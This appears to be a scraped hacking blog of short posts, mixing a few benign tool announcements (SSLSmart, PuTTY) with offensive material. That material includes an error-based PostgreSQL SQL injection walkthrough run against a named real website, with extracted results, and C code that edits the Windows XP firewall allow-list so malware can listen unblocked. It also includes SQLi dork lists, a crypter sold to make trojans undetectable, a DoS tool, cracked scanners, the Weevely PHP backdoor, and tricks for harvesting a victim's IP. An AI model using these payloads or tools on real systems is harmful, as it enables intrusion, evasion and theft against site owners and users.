Perform Smart SSL Cipher Enumeration:SSL Smart

SSLSmart, a highly flexible and interactive tool aimed at improving efficiency and reducing the false positives during SSL testing.
Among other things, SSLSmart simply an advanced and highly flexible Ruby based smart SSL cipher enumeration tool. It is an open source, cross platform, free tool. It was programmed because a number of tools on the Windows platform allow users to test for supported SSL ciphers suites, but most only provide testers with a fixed set of cipher suites. Further testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.


SSLSmart Features:


SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:

• Content Scan (default): Exact server response can be seen in HTML and Text forms for each
• cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
• CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
• Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
• Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate4 repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
• Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy5.
• Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
• API’s: Monkey patched Ruby API’s that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These API’s can be consumed by users who work with the SSLSmart gem.

What i liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that i liked is the API support. These API’s form the backbone for SSLSmart tests can be used to write custom scripts. SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems and it comes from McAfee labs!


Platform Support and Installers:


SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby6 (2.0.0) and builder7 (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).


Download SSLSmart:


SSLSmart 1.0 – SSLSmart-Gem-Win-Installer.zip/sslsmart-1.0.gem – http://downloadcenter.mcafee.com/products/tools/foundstone/SSLSmart-Gem-Win-Installer.zip

Best Password Hacking Breaking Tools 2011 Link Updated

Hello Friends , Today I am sharing with you my latest Collection of "Best Password Hacking Tools 2011". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will like this post.

This Password Hacking Kit Consists of following Password Hacking Breaking Tools:

1. PDF Password Remover

2. Windows XP Admin Password Remover

3. Zip File Password Cracker.

4. SQL Password Remover

5. Microsoft Office Password Remover.

6. Microsoft Windows Vista Password Remover.

7. Rar File Password Cracker

8. Windows Password Recovery Kit

9. Password Changer.

10. Distributed File Password Recovery..

and much more..

As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools ..

How to Use it??

1. Download the Password Hacking Kit From Below:

DOWNLOAD

2. Extract the file and Install it.

3. Then Register them and use it. ( all tools contains Full serial keys and patches)..

winAUTOPWN v2.7 Released - Vulnerability Testing on Windows

winAUTOPWN and bsdAUTOPWN are minimal Interactive Frameworks which act as a frontend for quick systems vulnerability exploitation. It takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi- threaded portscan for TCP ports 1 to 65535. Exploits capable of giving Remote Shells, which are released publicly over the Internet by active contributors and exploit writers are constantly added to winAUTOPWN/bsdAUTOPWN. A lot of these exploits are written in scripting languages like python, perl and php. Presence of these language interpreters is essential for successful exploitations using winAUTOPWN/bsdAUTOPWN.

Exploits written in languages like C, Delphi, ASM which can be compiled are pre-compiled and added along-with others. On successful exploitation winAUTOPWN/bsdAUTOPWN gives a remote shell and waits for the attacker to use the shell before trying other exploits. This way the attacker can count and check the number of exploits which actually worked on a Target System.



Download

WebsiteDefender – Ensure Your Website Security

WebsiteDefender is an online service that monitors your website for hacker activity, audits the security of your web site and gives you easy to understand solutions to keep your website safe. With WebsiteDefender you can:

• Detect Malware present on your website
• Audit your web site for security issues
• Avoid getting blacklisted by Google
• Keep your web site content & data safe
• Get alerted to suspicious hacker activity

It has an easy to user interface, it picks up all kinds of issues such as malware, reverse shells like c99, obvious stuff like outdated Plugins and WordPress core, weak passwords, bad configurations (including .htaccess config) and much more.

Each alert is well explained and will help you to solve any issues the system finds on your blog/site.

The great value with this for me is once you are subscribed, you will be automatically alerted of new issues by email as and when they occur. This will help you keep your website secure and will let you know immediately if any issues develop.
They’ve even released two WordPress plugins which you can find here:
WP Security Scan & Secure WordPress
You can check out the website here and sign up for a free account to test it out:
http://www.websitedefender.com/
They are on Twitter too @WebsiteDefender & Facebook.

Online SQLi Scanners

http://scanner.drie88.tk/
http://wolfscps.com/gscanner.php
http://cattuong.net/
http://www.sunmagazin.com/tools/hack/SQLI-Scan/
http://www.be007.gigfa.com/scanner/scanner.php
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/

Regards
iMasterhack

Browser Based Hacking Framework - Mantra Security Toolkit 0.6.1 Released

Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

The software is intended to be lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.


Project Goals

• Create an ecosystem for hackers based on browser
• To bring the attention of security people to the potential of a browser based security platform
• Provide easy to use and portable platform for demonstrating common web based attacks( read training )
• To associate with other security tools/products to make a better environment.

You can download Mantra 0.6.1 here:
Linux 32-bit – Mantra Security Toolkit – Gandiva.tar.bz2
Windows – OWASP Mantra Security Toolkit – Gandiva.exe
Or read more here.

WordPress Security/Vulnerability Scanner - WPScan

WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach (scanning without any prior knowledge of what has been installed etc).

Features

• Username enumeration (from author querystring and location header)
• Weak password cracking (multithreaded)
• Version enumeration (from generator meta tag)
• Vulnerability enumeration (based on version)
• Plugin enumeration (2220 most popular by default)
• Plugin vulnerability enumeration (based on version) (todo)
• Plugin enumeration list generation
• Other misc WordPress checks (theme name, dir listing, …)

Requirements

WPScan requires two non native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

sudo apt-get install libcurl4-gnutls-dev
sudo gem install –user-install typhoeus
sudo gem install –user-install xml-simple

The full README is available here.

You can download WPScan by checking it out from the SVN repository on Google Code:

svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

Or you can read more here.

PuTTY v.0.61 Released

PuTTY 0.61 is out, after over four years , with new features, bug fixes, and compatibility updates for Windows 7 and various SSH server software.

                                                         

PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator

These features are new in beta 0.61:

Kerberos/GSSAPI authentication in SSH-2.

Local X11 authorisation support on Windows. (Unix already had it, of course.)

Support for non-fixed-width fonts on Windows.

GTK 2 support on Unix.

Specifying the logical host name independently of the physical network address to connect to.

Crypto and flow control optimisations.

Support for the zlib@openssh.com SSH-2 compression method.

Support for new Windows 7 UI features: Aero resizing and jump lists.

Support for OpenSSH AES-encrypted private key files in PuTTYgen.

Bug fix: handles OpenSSH private keys with primes in either order.

Bug fix: corruption of port forwarding is fixed (we think).

Bug fix: various crashes and hangs when exiting on failure,

Bug fix: hang in the serial back end on Windows.

Bug fix: Windows clipboard is now read asynchronously, in case of deadlock due to the clipboard owner being at the far end of the same PuTTY's network connection (either via X forwarding or via tunnelled rdesktop).

Download: http://www.chiark.greenend.org.uk

Cryptinator - A simple Encryption Application

Today i decided to make a program like the following one i saw earlier.


But instead of just copying it exactly, i used a different encryption algorithm (polystairs) and different methods towards generating/compiling a code.

I am not sure what you would have use for this, but for me when ever i need a completely random string i will use this now.

Cryptinator ScreenShot:


Virus Scan
Download

 

iCrypt Err0r Version

This crypter makes Your Trojan undetectable.

Never Upload at virustotal use only NoVirusThanks.org




Download

http://www.4shared.com/file/z1KjxfDn/iCr...rsion.html

TeV DoS Tool | Easy DoS Attack

 This easy DoS tool was made by Elixed_ in java.
Direct download: https://www.dropbox.com/s/v7vb8ikl47kd8wl/TeV%20DoS.rar

  It only go down for you when your own internet is shit. Else it will be down for everyone, it uses your internet connection.


For the people that really wants a screen:

xuhaid SQLi Scanner V3

xuhaid SQLi Scanner V3
--Status:[online]--


I HIGHLY recommend you to use this SQLi Scanner, and not .exe tools!
Side Note: Better dork = more results! Keep that in mind!

Ok In This Version We have 2 New Scanner's Public & Private ... And In this Version I have added Duplicate Link remover Soo that after scanning you guys can easily remove duplicate Links.

Private Online SQLi Scanner V1
*Click here to Access*

Public Online SQLi Scanner V1
*Click here to Access*

Private Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Public Online Sqli Scanner V2 Source Code edited By XuhaiD (Only Vulnerable Sites )
*Click here to Access*

Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner For Those who hate scanning websites For more info Check here : http://sqlscanner.info/Public-Sql-Scanne...index.html

Public Scanner Version 1 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v1log.txt

Public Scanner Version 2 Logger here : http://sqlscanner.info/Public-Sql-Scanner/v2log.txt

After Scanning You can Now easily Remove Links with one Click From here : http://sqlscanner.info/Repeatremover.html

About Version 2 If you Guys Don,t know This will Scan Only Vulnerable Sites

Dork List :

Code:

inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Quote:Use online sqli scanner (scan specific: websites/domains/countries)

Code:

www.sqlscanner.info

Quote:How to: Scan specific websites

Just use it like this:
inurl:php?id=+site:[domain of website]

you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br

If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk

If You Face Any Kind of Problem Comment Here
Regards
iMasterhack

Acunetix Ver 7.0 Cracked Working and UPDATEABLE

Tested in : Windows xp desktop Pc and windows 7 Ultimate Laptop and its working and UPDATEABLE!! .. 

But  only use in Vmware because i am not 100 % sure if it is clean ... 

Thanks...

Download Info 

Code:

http://www.multiupload.com/EECTPQMDUH

Pangolin Professional working Tested

I am using and it is works ..IT  is better than Havij because it Can Work with https and also you can upload files with load file function .

also please use only in vmware because i am not sure if it is 100 % clean .

Download Info

Code:

http://www.multiupload.com/H5NWYJSASK

Rce,Lfi,Rfi,Sqli scanner Darkjumper v5.8

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner 

Darkjumper is a free tool who will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

·Scan sql injection, rfi, lfi, blind sql injection
· Autosql injector
· Proxy support
· Verbocity
· Autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python

Screenshot: 

Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

How to get IP address of another computer remotely

Hello friends, today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.

How to find or get Ip address of somebody else remotely

4 ways to get the IP address of the Victim or another Computer:

1. Using PHP notification Script

2. Using Blogs and Websites

3. Using Read Notify service

4. Sniffing during Gmail and yahoo chat  sessions

As we are here to learn concepts so i will first explain what is an IP address and what's its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?

What is an IP address? 

Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication). 

IP address serves for two basic purposes:

1. Host or network interface identification

2. Location Addressing

For exploring more about IP addressing read on wikipedia.

How to Find IP address of another computer?

1. Using PHP notification Script

Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:

a. Download the PHP notify script and extract files.

Download PHP notification script here

b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.

Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.

c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.

d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.

e. That's all this method... I hope you liked it.

2. Using Blogs and Websites

This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

That's only.

3. Using Read Notify service

This is an email based service. Steps to use Read Notify service:

a. First open the Read Notify website : RCPT

b. Now register on this website and then it will send you confirmation mail. Verify your account.

c. Once your account is activated. 

Do the following steps use this service:

1. Compose your email just like you usually would in your own email or web email program
2. Type:   .readnotify.com   on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.readnotify.com  
3. Send your email

Some things to remember: 

• don't send to and from the same computer
• if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
• if you are cc-ing your email to other readers, you must add tracking to all of them 

4.  Sniffing Yahoo and Gmail Chat sessions

With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there. I will explain this trick in detail in my next article as its a long article in itself.

5. Bonus Method for Online Gamers

We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.

Now you have IP address but what you can do with an IP address. Ahhaah everything, that i will explain in my next article.

A Stealth Tiny PHP Backdoor! weevely

With Weevely you can create and manage PHP trojan designed to be hardly detectable. This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. Generate PHP code to trojanize a web server, and act like a telnet client to execute commands or inject addictional function on backdoored server. weevely is also included in blackbox linux.

Features of weevely:

• Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
• PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server.
• Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
• Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .

Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses.

Download Weevely v0.3 (weevely-0.3.tar.gz) here.

Postgre:

Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.

Lets start to play with Postgre:

1st Step find the vulnerability:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.

2nd Step Columns count:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.

Lets try UNION SELECT query:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.

Lets move on and find database name.

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :)

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.

Lets find out the user:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)

Lets find the tables :>
4th step:

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)

5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.

Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..

Last step:
Now we have to extract data from our column .

Code:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"

How to Bypass Windows XP Firewall

How to Bypass Windows XP Firewall using C program.

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.

This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

All Hacking Tutorials By Mr.Mindfreak

Presents Hacking Tutorial All in one Collection By Mr.Mindfreak

Mr.Mindfreak:"Hello My Fans Or My Hacking Page Followers i Upload My Hacking Tutorials in DVD Fully High Quality And Share Here So Download and Learn Hacking Easily "

Remember Me in Your Prays .!

Download From FileSonic:

Folder Linkhttp://www.filesonic.com/folder/6284231

Download From FileServe:

Folder link:

http://www.fileserve.com/list/qKUBhap